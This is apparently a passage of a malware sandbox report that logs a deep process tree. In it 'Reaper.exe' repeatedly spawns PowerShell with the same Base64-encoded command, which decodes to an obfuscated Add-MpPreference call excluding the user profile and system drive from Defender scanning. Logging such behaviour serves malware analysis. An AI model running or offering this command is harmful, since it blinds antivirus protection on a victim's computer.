"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
39⤵
- Command and Scripting Interpreter: PowerShell
PID:5316

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
39⤵
PID:1108

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
40⤵
- Command and Scripting Interpreter: PowerShell
PID:5948

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
40⤵
PID:6752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
41⤵
- Command and Scripting Interpreter: PowerShell
PID:4472

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
41⤵
PID:1096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
42⤵
PID:6776

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
42⤵
PID:6160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
43⤵
- Command and Scripting Interpreter: PowerShell
PID:1592

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
43⤵
PID:6396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
44⤵
- Command and Scripting Interpreter: PowerShell
PID:2896

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
44⤵
PID:3092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
45⤵
- Command and Scripting Interpreter: PowerShell
PID:2436

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
45⤵
PID:4964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
46⤵
- Command and Scripting Interpreter: PowerShell
PID:6376

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
46⤵
PID:2988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
47⤵
PID:4124

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
47⤵
PID:3424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
48⤵
PID:4828

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
48⤵
PID:5888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
49⤵
- Command and Scripting Interpreter: PowerShell
PID:6660

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
49⤵
PID:4596

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
50⤵
- Command and Scripting Interpreter: PowerShell
PID:7484

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
50⤵
PID:7492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
51⤵
- Command and Scripting Interpreter: PowerShell
PID:1700

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
51⤵
PID:4916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
52⤵
PID:6964

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
52⤵
PID:1828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
53⤵
- Command and Scripting Interpreter: PowerShell
PID:340

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
53⤵
PID:5352

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
54⤵
PID:8184

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
54⤵
PID:7512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
55⤵
- Command and Scripting Interpreter: PowerShell
PID:5116

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
55⤵
PID:5044

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
56⤵
- Command and Scripting Interpreter: PowerShell
PID:6928

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
56⤵
PID:7736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
57⤵
PID:5312

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
57⤵
PID:6316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
58⤵
- Command and Scripting Interpreter: PowerShell
PID:3412

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
58⤵
PID:2916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
59⤵
PID:2800

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
59⤵
PID:8168

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
60⤵
- Command and Scripting Interpreter: PowerShell
PID:7620

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
60⤵
PID:3392

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
61⤵
- Command and Scripting Interpreter: PowerShell
PID:7068

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
61⤵
PID:5344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
62⤵
- Command and Scripting Interpreter: PowerShell
PID:7892

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
62⤵
PID:5140

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
63⤵
- Command and Scripting Interpreter: PowerShell
PID:4104

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
63⤵
PID:6940

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
64⤵
- Command and Scripting Interpreter: PowerShell
PID:5416

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
64⤵
PID:4660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
65⤵
- Command and Scripting Interpreter: PowerShell
PID:6200

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
65⤵
PID:4672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
66⤵
- Command and Scripting Interpreter: PowerShell
PID:5192

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
66⤵
PID:3780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
67⤵
- Command and Scripting Interpreter: PowerShell
PID:6916

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
67⤵
PID:4660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
68⤵
- Command and Scripting Interpreter: PowerShell
PID:2028

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
68⤵
PID:6540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
69⤵
- Command and Scripting Interpreter: PowerShell
PID:6852

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
69⤵
PID:6624

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
70⤵
- Command and Scripting Interpreter: PowerShell
PID:5448

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
70⤵
PID:7180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
71⤵
- Command and Scripting Interpreter: PowerShell
PID:6672

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
71⤵
PID:7924

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
